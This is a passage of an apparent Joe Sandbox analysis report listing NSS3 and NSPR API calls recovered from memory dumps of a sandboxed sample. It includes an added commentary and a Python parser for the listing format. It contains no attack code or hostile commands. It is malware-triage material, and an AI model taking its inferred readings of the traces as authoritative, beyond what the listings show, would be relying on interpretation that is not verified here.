• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
• String ID:
• API String ID: 2524771861-0
• Opcode ID: 997a928982f1f44679500ffe551d8e3bc81fcae07ab47b0342ffdef141ff92a4
• Instruction ID: 11f6e83c7b709ec8ef11116217ce059535c92d5c2547ef586ae2bb3a393a3a0c
• Opcode Fuzzy Hash: 997a928982f1f44679500ffe551d8e3bc81fcae07ab47b0342ffdef141ff92a4
• Instruction Fuzzy Hash: 1A815D75A00209ABEB00DFA5DC85EDE7BB5BF48319F154068F909A7B11E731E9248BE1
APIs
• PK11_SignatureLen.NSS3(?), ref: 6C484D80
• PORT_Alloc_Util.NSS3(00000000), ref: 6C484D95
• PORT_NewArena_Util.NSS3(00000800), ref: 6C484DF2
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C484E2C
• PR_SetError.NSS3(FFFFE028,00000000), ref: 6C484E43
• PORT_NewArena_Util.NSS3(00000800), ref: 6C484E58
• SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C484E85
• DER_Encode_Util.NSS3(?,?,6C5D05A4,00000000), ref: 6C484EA7
• PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C484F17
• DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C484F45
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484F62
• PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C484F7A
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C484F89
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484FC8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2843999940-0
                                                                                                                                                                                                                          • Opcode ID: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                          • Instruction ID: 5c63956e96acee10e56fcd7e79b5c755962903df295741b02458712373cb5646
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0881AF71A0A301AFE701CF28D850F5AB7E8AB84398F15952DFA58DB740E731E905CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C4C5C9B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C4C5CF4
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C4C5CFD
                                                                                                                                                                                                                          • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C4C5D42
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C4C5D4E
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5D78
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5E18
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C5E5E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C5E72
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C5E8B
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                          • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                          • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                          • Opcode ID: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                          • Instruction ID: d2121954b11c308731a2fa8168b6f5a17192e2d75b69afc2ea580ef96a01b812
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3771B4B8B052019BEB01DF25EC45F6E3275AF4531DF144039E8099AB62EB32E915D7E3
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(6C4B9582), ref: 6C4B8F5B
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C4B8F6A
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B8FC3
                                                                                                                                                                                                                          • PK11_GetIVLength.NSS3(-00000001), ref: 6C4B8FE0
                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C59D820,6C4B9576), ref: 6C4B8FF9
                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C4B901D
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B903E
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4B9062
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C4B90A2
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B90CA
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C4B90F0
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4B912D
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B9136
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C4B9145
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3626836424-0
                                                                                                                                                                                                                          • Opcode ID: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                          • Instruction ID: d36f2f11bbee2b8d92e01056e296a2a99b088d866e251e541716e2e63982138d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A51D4B1A042409BEB00DF28DC81F9A77F8AFA4318F054529E859E7741E776E945CBE2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C46AF47
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
  • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
• FreeLibrary.KERNEL32(?), ref: 6C46AF6D
• free.MOZGLUE(?), ref: 6C46AFA4
• free.MOZGLUE(?), ref: 6C46AFAA
• PR_ExitMonitor.NSS3 ref: 6C46AFB5
• PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C46AFF5
• PR_ExitMonitor.NSS3 ref: 6C46B005
• PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B014
• PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C46B028
• PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B03C
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
• String ID: %s decr => %d$Unloaded library %s
• API String ID: 4015679603-2877805755
• Opcode ID: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
• Instruction ID: b7cf09218529176aab2947cdd7d486e66ffc8663187d5986027ced8389707b8b
• Opcode Fuzzy Hash: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
• Instruction Fuzzy Hash: 6531F1B4B04921ABEB00EE62DC40F1AB7B4EF45319B194125E80987F04F722F825CBE6
APIs
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
• PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
  • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
  • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
  • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
  • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
• String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
• API String ID: 4221828374-3736768024
• Opcode ID: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
• Instruction ID: 897c31a8b1060092653288bfd06bfe4c0126d4ca17aff29620e7d388ce14d90e
• Opcode Fuzzy Hash: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
• Instruction Fuzzy Hash: F501A7B170371537EA10277A5D69F66366C9F42199F180435FE04F0A41EBF2F61940BD
APIs
• TlsGetValue.KERNEL32 ref: 6C4C5857
• EnterCriticalSection.KERNEL32(?), ref: 6C4C586B
• PR_Unlock.NSS3(?), ref: 6C4C5888
• TlsGetValue.KERNEL32 ref: 6C4C58B9
• EnterCriticalSection.KERNEL32(?), ref: 6C4C58CD
• PR_Unlock.NSS3(?), ref: 6C4C58E9
  • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,00000000,?,6C4C5915,?), ref: 6C4C5556
  • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,6C4C5915,?), ref: 6C4C556F
  • Part of subcall function 6C4C5530: PR_Unlock.NSS3(?,?,?,?,?), ref: 6C4C559C
  • Part of subcall function 6C4C5530: SECMOD_UpdateSlotList.NSS3(?,?,?,?,?), ref: 6C4C55A4
  • Part of subcall function 6C4C5530: PR_Sleep.NSS3(?,?,?,?), ref: 6C4C5643
  • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,?), ref: 6C4C5653
  • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 6C4C5668
• PR_SetError.NSS3(FFFFE098,00000000), ref: 6C4C5934
• PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4C59AA
• SECMOD_UpdateSlotList.NSS3(?), ref: 6C4C59B3
• TlsGetValue.KERNEL32 ref: 6C4C5A4D
• EnterCriticalSection.KERNEL32(?), ref: 6C4C5A61
• PR_Unlock.NSS3(?), ref: 6C4C5A7A
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalEnterSectionValue$Unlock$ErrorListSlotUpdate$Sleep
• String ID:
• API String ID: 1180358131-0
• Opcode ID: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
• Instruction ID: 6ab9620a04b6650978e7c14f5bbfbbb6dff2b9624a341b4c4c845950ed8b045e
• Opcode Fuzzy Hash: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
• Instruction Fuzzy Hash: 5F81F0B9F006019BEB00DF29DC81E6E77B5BF45328F140528E84A86B62E731E955CB92
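How to read the three listings above, as an added note rather than anything the report itself states: the first function's sequence (FreeLibrary, two free calls, PR_ExitMonitor, a PR_LogPrint of "%s decr => %d", then PR_SetError with FFFFE89D and a PR_LogPrint of "Unloaded library %s") has the shape of NSPR's PR_UnloadLibrary. The "decr" in that format string is the library reference-count decrement NSPR logs, not a decryption step, and FFFFE89D is the 32-bit two's-complement form of -5987, PR_INVALID_ARGUMENT_ERROR in prerr.h. The second function's strncmp calls against "dbm:", "sql:", "rdb:" and "extern:", followed by PR_GetEnvSecure("NSS_DEFAULT_DB_TYPE") and a strcmp against "dbm", are NSS's configuration-directory prefix evaluation, which runs when a caller initialises NSS on a profile directory. The Python below is an added example, not part of the report or of NSS: a parser for the listing's own line format ("• function.MODULE(args), ref: address", optionally prefixed by "Part of subcall function <addr>:") that extracts call records, decodes PR_SetError codes from their sign-extended hex form into the NSPR, SEC or SSL error family, and pulls the strncmp prefix table out of the trace. The sample lines are copied from the listings above; the error-code bases are those of NSPR's prerr.h and NSS's secerr.h and sslerr.h; the name table is deliberately limited to the one code this sample needs.

```python
"""Parse Joe Sandbox 'APIs' listing lines and decode PR_SetError codes.

Added example, not part of the sandbox report or of NSS/NSPR. The sample
lines are copied from the function listings in the report; the regex,
record type and error-range table are this file's own design.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied verbatim from the report's listings
# (the PR_UnloadLibrary-shaped function, the DB-type prefix checks, and the
# SECMOD slot-list function). Arguments the sandbox could not resolve are "?".
SAMPLE_LISTING = """\
  • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
• FreeLibrary.KERNEL32(?), ref: 6C46AF6D
• free.MOZGLUE(?), ref: 6C46AFA4
• PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C46AFF5
• PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B014
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
• PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
• PR_SetError.NSS3(FFFFE098,00000000), ref: 6C4C5934
• PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4C59AA
"""

# One listing line: optional "Part of subcall function <addr>:" prefix, then
# <function>.<module>, an optional "(arg,arg,...)" list, then "ref: <addr>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9-]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: tuple[str, ...]
    ref: int                      # address of the call site
    parent: Optional[int] = None  # set for "Part of subcall function" lines


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one listing line; None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
    parent = int(m["parent"], 16) if m["parent"] else None
    return ApiCall(m["func"], m["module"], args, int(m["ref"], 16), parent)


def parse_listing(text: str) -> list[ApiCall]:
    """Parse every non-blank line, failing loudly on an unrecognised one."""
    calls = []
    for line in text.splitlines():
        if line.strip():
            call = parse_line(line)
            if call is None:
                raise ValueError(f"unrecognised listing line: {line!r}")
            calls.append(call)
    return calls


# Error-code bases from NSPR prerr.h, NSS secerr.h and sslerr.h. The listing
# prints PR_SetError's first argument as unsigned 32-bit hex, so FFFFE89D is
# the sign-extended form of -5987.
PR_NSPR_ERROR_BASE = -6000
SEC_ERROR_BASE = -0x2000   # -8192
SSL_ERROR_BASE = -0x3000   # -12288
ERROR_FAMILIES = (("SSL", SSL_ERROR_BASE), ("SEC", SEC_ERROR_BASE), ("NSPR", PR_NSPR_ERROR_BASE))
# Partial name table: only the code this sample needs; extend from prerr.h.
KNOWN_ERROR_NAMES = {-5987: "PR_INVALID_ARGUMENT_ERROR"}


def decode_error_code(hex_arg: str) -> int:
    """Interpret an 8-digit hex argument as a signed 32-bit integer."""
    value = int(hex_arg, 16)
    return value - (1 << 32) if value >= (1 << 31) else value


def error_family(code: int) -> str:
    for family, base in ERROR_FAMILIES:
        if base <= code < base + 1000:
            return family
    return "unknown"


def set_error_calls(calls: list[ApiCall]) -> list[tuple[int, int, str, Optional[str]]]:
    """(call site, signed code, family, name-or-None) for every PR_SetError."""
    out = []
    for c in calls:
        if c.func == "PR_SetError" and c.args:
            code = decode_error_code(c.args[0])
            out.append((c.ref, code, error_family(code), KNOWN_ERROR_NAMES.get(code)))
    return out


def compared_prefixes(calls: list[ApiCall]) -> list[tuple[str, int]]:
    """(literal, length) from strncmp(buf, literal, n) calls: this is how the
    'dbm:'/'sql:'/'rdb:'/'extern:' dispatch shows up in the trace."""
    return [(c.args[1], int(c.args[2], 16))
            for c in calls
            if c.func == "strncmp" and len(c.args) >= 3 and c.args[1] != "?"]


def calls_by_module(calls: list[ApiCall]) -> Counter:
    return Counter(c.module for c in calls)


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for ref, code, family, name in set_error_calls(parsed):
        label = f"{family}, {name}" if name else family
        print(f"PR_SetError at {ref:08X}: {code} ({label})")
    print("strncmp prefixes:", compared_prefixes(parsed))
    print("calls per module:", dict(calls_by_module(parsed)))
```

Running the file prints the three PR_SetError sites with their signed codes (-5987 in the NSPR range, -8040 and -8038 in the SEC range), the prefix table the second function compares against, and a per-module call count. Lines the sandbox renders without a ref address, or with a module name outside the KERNEL32/NSS3/MOZGLUE/API-MS-* pattern seen on this page, are rejected by parse_listing rather than silently skipped, which is the safer default when the parsed output feeds a triage decision.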
APIs
• PR_SetErrorText.NSS3(00000000,00000000,?,6C4878F8), ref: 6C4C4E6D
  • Part of subcall function 6C4609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C4606A2,00000000,?), ref: 6C4609F8
  • Part of subcall function 6C4609E0: malloc.MOZGLUE(0000001F), ref: 6C460A18
  • Part of subcall function 6C4609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C460A33
• PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C4878F8), ref: 6C4C4ED9
  • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703,?,00000000,00000000), ref: 6C4B5942
  • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703), ref: 6C4B5954
  • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B596A
  • Part of subcall function 6C4B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B5984
  • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C4B5999
  • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59BA
  • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C4B59D3
  • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59F5
  • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C4B5A0A
  • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B5A2E
  • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C4B5A43
• SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EB3
  • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C484C
